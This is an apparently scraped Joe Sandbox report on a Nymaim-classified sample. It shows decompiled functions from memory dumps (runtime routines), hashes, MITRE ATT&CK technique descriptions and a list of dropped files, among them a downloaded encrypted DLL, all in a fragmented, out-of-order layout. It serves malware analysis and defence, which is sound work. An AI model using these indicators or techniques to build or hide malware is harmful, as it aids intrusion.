						E0040F25B(_t20, _t31, 0x42d3f0);
						E0040EEFE(0x450f50);
					}
				}
				return E0040EBBF(0x450d98, 0x2e, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x00409460
0x00409460
0x00409460
0x00409466
0x0040946d
0x00409477
0x00409480
0x00409486
0x00409488
0x00409493
0x0040949a
0x004094a2
0x004094a9
0x004094ae
0x004094b5
0x004094c3
0x004094ca
0x004094d0
0x004094d6
0x004094e0
0x004094e5
0x004094a9
0x004094fb

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 004094E0

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

F^, xrefs: 00409480
A@, xrefs: 00409477

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: A@$F^
API String ID: 2296764815-756130965
Opcode ID: b3d270ef5b96a7ee1581324bb411de95daac9417756f6a0bdbb33eb6c345495d
Instruction ID: 6c7a6d0756c4f162afa1c2070c0bcf59aef1f867ba74d1dc7902e0ff42b24005
Opcode Fuzzy Hash: b3d270ef5b96a7ee1581324bb411de95daac9417756f6a0bdbb33eb6c345495d
Instruction Fuzzy Hash: F901D239A003489BC710DFA9ED42599B370EB55701F5001BAE909673A2D678EA48CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00424479 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424479(void* __eflags, int _a4) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				int _t10;
				void* _t14;

				_t1 =  &_v20; // 0x4246ea
				E00413621(_t1, _t14, 0);
				 *0x450cc0 =  *0x450cc0 & 0x00000000;
				_t10 = _a4;
				if(_t10 != 0xfffffffe) {
					if(_t10 != 0xfffffffd) {
						if(_t10 == 0xfffffffc) {
							 *0x450cc0 = 1;
							_t10 =  *(_v16 + 8);
						}
					} else {
						 *0x450cc0 = 1;
						_t10 = GetACP();
					}
				} else {
					 *0x450cc0 = 1;
					_t10 = GetOEMCP();
				}
				if(_v8 == 0) {
					return _t10;
				} else {
					_t6 =  &_v20; // 0x4246ea
					 *( *_t6 + 0x350) =  *( *_t6 + 0x350) & 0xfffffffd;
					return _t10;
				}
			}

0x00424481
0x00424486
0x0042448b
0x00424492
0x00424498
0x004244af
0x004244c6
0x004244cb
0x004244d5
0x004244d5
0x004244b1
0x004244b1
0x004244bb
0x004244bb
0x0042449a
0x0042449a
0x004244a4
0x004244a4
0x004244dc
0x004244e9
0x004244de
0x004244de
0x004244e1
0x00000000
0x004244e1

APIs

GetOEMCP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244A4
GetACP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244BB

Strings

FB, xrefs: 00424481, 004244DE

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID: FB
API String ID: 0-3670039715
Opcode ID: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
Instruction ID: 521155ed4fd04c10d09fec07b2a217d09ec56201c3508306b013a50f1c28b22d
Opcode Fuzzy Hash: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
Instruction Fuzzy Hash: 14F0C230600220DBCB14EB64E8487BD3770FB8133AFA00755E034872E2CBB49941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403D90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00403D90(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _t16;
				intOrPtr _t18;

				_t18 = _a4;
				asm("xorps xmm0, xmm0");
				_t16 = __ecx;
				 *__ecx = 0x42e2d4;
				asm("movq [eax], xmm0");
				E0040FF71(_t18 + 4, __ecx + 4);
				 *_t16 = 0x439c98;
				 *((intOrPtr*)(_t16 + 0xc)) =  *((intOrPtr*)(_t18 + 0xc));
				 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t18 + 0x10));
				 *_t16 = 0x439d04;
				return _t16;
			}

0x00403d94
0x00403d97
0x00403d9b
0x00403da1
0x00403da7
0x00403daf
0x00403db4
0x00403dc3
0x00403dc8
0x00403dcb
0x00403dd4

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403DAF

Strings

`=@, xrefs: 00403DB4
`=@, xrefs: 00403DCB

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: `=@$`=@
API String ID: 2659868963-2373854662
Opcode ID: 4b50160e959331e57da2a4db2d37d7e516b6b0fad8e09b272cf4e57e40a249b1
Instruction ID: c33fae4a20f9ec275494595788b59750feb4b5a2f93437c52e8352574578c9ea
Opcode Fuzzy Hash: 4b50160e959331e57da2a4db2d37d7e516b6b0fad8e09b272cf4e57e40a249b1
Instruction Fuzzy Hash: 2CF0ACB6A10716AB8714DF59D440882F7ECFF59320714C62BE519D7B00F7B4A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Nymaim

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\PrintFolders\Guide.chm (copy)

C:\Program Files (x86)\PrintFolders\History.txt (copy)

C:\Program Files (x86)\PrintFolders\License.txt (copy)

C:\Program Files (x86)\PrintFolders\PrintFolders.exe

C:\Program Files (x86)\PrintFolders\Russian.dll (copy)

C:\Program Files (x86)\PrintFolders\is-0E5GB.tmp

C:\Program Files (x86)\PrintFolders\is-2632S.tmp

C:\Program Files (x86)\PrintFolders\is-48N1K.tmp

C:\Program Files (x86)\PrintFolders\is-5F7BS.tmp

C:\Program Files (x86)\PrintFolders\is-60UNK.tmp

C:\Program Files (x86)\PrintFolders\is-OK1CQ.tmp

C:\Program Files (x86)\PrintFolders\unins000.dat

C:\Program Files (x86)\PrintFolders\unins000.exe (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ping[1].htm

Windows Analysis Report
file.exe

Function 004095D0 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Function 004051C8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 00409428 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
windowCOMMON

Function 00409B76 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 109
COMMON

Function 00409B63 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106
COMMON

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59
COMMON

Function 004098DD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 119
windowCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre